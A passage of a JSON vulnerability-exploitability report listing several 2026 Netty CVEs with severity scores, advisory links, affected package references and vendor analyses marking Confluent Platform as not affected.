          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-55851",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final up to (but not including) 4.2.16.Final, and 4.1.0.Final up to (but not including) 4.1.135, the `HAProxyMessageDecoder` in Netty's `codec-haproxy` module performs protocol version detection by reading the 13th byte as a signed Java `byte` and widening it to `int` without masking; a PROXY protocol v2 binary prefix followed by version byte `0xFF` sign-extends to `-1`, collides with the decoder's need-more-data sentinel, and causes `ByteToMessageDecoder` to accumulate inbound bytes in an unbounded `cumulation` buffer until direct memory is exhausted. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55851"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55851"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q6cq-mhr2-jmr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55851"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55851"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:48:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#7489f1b9-7127-4f17-8c04-437d70601ba3"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#d8ad0772-a581-45f2-9af4-18d5d8a558f8"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#70eead68-90f1-4aed-94b3-8485bb64ae81"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#ac550d31-623c-48f4-a9cb-04916412b3ec"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#e6ac5f9c-452e-4e55-aac2-fc530dc0bf86"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e03af5af-316f-4750-ad8c-cf2740c26a49"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f5e87789-c100-47c1-a60a-589a2fb03284"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f0a2a5f2-49df-4395-9144-481c15aae411"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fa9ee652-e15e-4094-b0f3-cd970dca5d77"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#e93637aa-fac1-4870-83dc-e803d61f6461"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#d3a553f6-bafd-4393-87df-c9e41afbecc0"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#cdc12e27-e58e-40ed-81b6-6f919b282eba"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c6db3213-7051-4add-b91f-8ee0c449331b"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d3211c70-e2e8-4a3d-b86e-fa3c0d672202"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only genuine wiring of the HAProxy decoder anywhere in the CP repo set is exclusively Confluent Cloud infrastructure that is not shipped with Confluent Platform."
      }
    },
    {
      "id": "CVE-2026-56745",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, the `SpdyHttpDecoder` handler in Netty's SPDY-to-HTTP codec allocates a pooled `ByteBuf` when processing a client-initiated `SYN_STREAM` frame with `FLAG_FIN=0` and stores the partially constructed `FullHttpRequest` in `messageMap`; when the remote peer sends `RST_STREAM` for that stream or the accumulated content exceeds `maxContentLength`, the decoder removes the entry but does not release the pooled `ByteBuf`, causing native memory exhaustion. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56745"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56745"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-jppx-w49h-x2qq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56745"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56745"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:46:55+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-56746",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        284
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, are vulnerable to security control bypass during the origin evaluation process. CorsHandler provides a shortCircuit() configuration designed to reject unauthorized cross-origin requests immediately, acting as a security control before requests reach the application. However, due to a logical operator error in the origin evaluation process, this protection can be entirely bypassed. An attacker can bypass the short-circuit mechanism by sending a request with an Origin: null header. This failure forwards unauthorized requests to the backend application, bypassing intended access controls. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56746"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56746"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6cqp-g7gg-8hr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56746"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56746"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:47:53+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56817",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        611
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, any caller that can deliver bytes to a Netty channel pipeline containing `XmlDecoder` can send XML with a `DOCTYPE` declaration to an `AsyncXMLInputFactory` instantiated with no security configuration, leaving DTD and entity handling active depending on Aalto XML async parser behavior and creating conditional XML external entity risk. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-xml to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56817"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56817"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-4qhr-g3c6-fcfx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56817"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56817"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:48:18+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#f0e55b81-9bc4-4712-ac6d-3015ef1ec577"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#e79b4d94-a8d6-4453-9d94-0b64c6bbe282"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#efc2174c-7822-484c-9f4c-94264a1c0813"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#bc75cb50-2b58-4484-ba25-bc2d97b5633f"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#70c34d5f-f5fa-467b-aa8d-24226ad2dd73"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#b49fc97b-ddc4-4b6a-9cf2-fa12f1f6387a"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#d348257e-0320-4c86-a427-e5af1552af4f"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#dc026aab-3384-4bf1-8f3a-9e4db676d875"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fe6bccd4-7bf1-4ca7-893f-354718132701"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f7cd90ad-7ef0-4650-b517-4b26fe48da64"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#dd84b826-9ffe-4c3a-a0d1-591e55e7165b"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#daa1c284-50f5-4f8e-8bf5-24abbb67e252"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#aaf82d26-8a05-4d18-845e-67d1ce867f12"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d8c8853d-6f6d-4486-8b76-3383f3075bfb"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56818",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        401,
        703
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, the RedisArrayAggregator Redis codec clears retained partial aggregate state when the maxNestedArrayDepth limit is exceeded, but it does not clear the same state when the sibling maxElements limit is exceeded. A peer can start a valid RESP array, send a bulk string child, then send a nested array header longer than the configured maxElements. Netty throws a decoder exception in decodeRedisArrayHeader, but the existing partial aggregate remains retained in the handler. If the application leaves the channel alive after the exception, later messages are still consumed into the pre-error aggregate, allowing an unauthenticated peer to keep attacker-controlled aggregate state alive across a security-limit exception and pin retained pooled buffers. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-redis to version 4.1.136.Final, 4.2.16.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56818"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-p9jm-q85p-7mcp"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56818"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56818"
        }
      ],
      "published": "2026-08-07T18:17:19+00:00",
      "updated": "2026-08-08T04:17:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-redis@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-redis@4.1.135.Final",
          "versions": [
            {
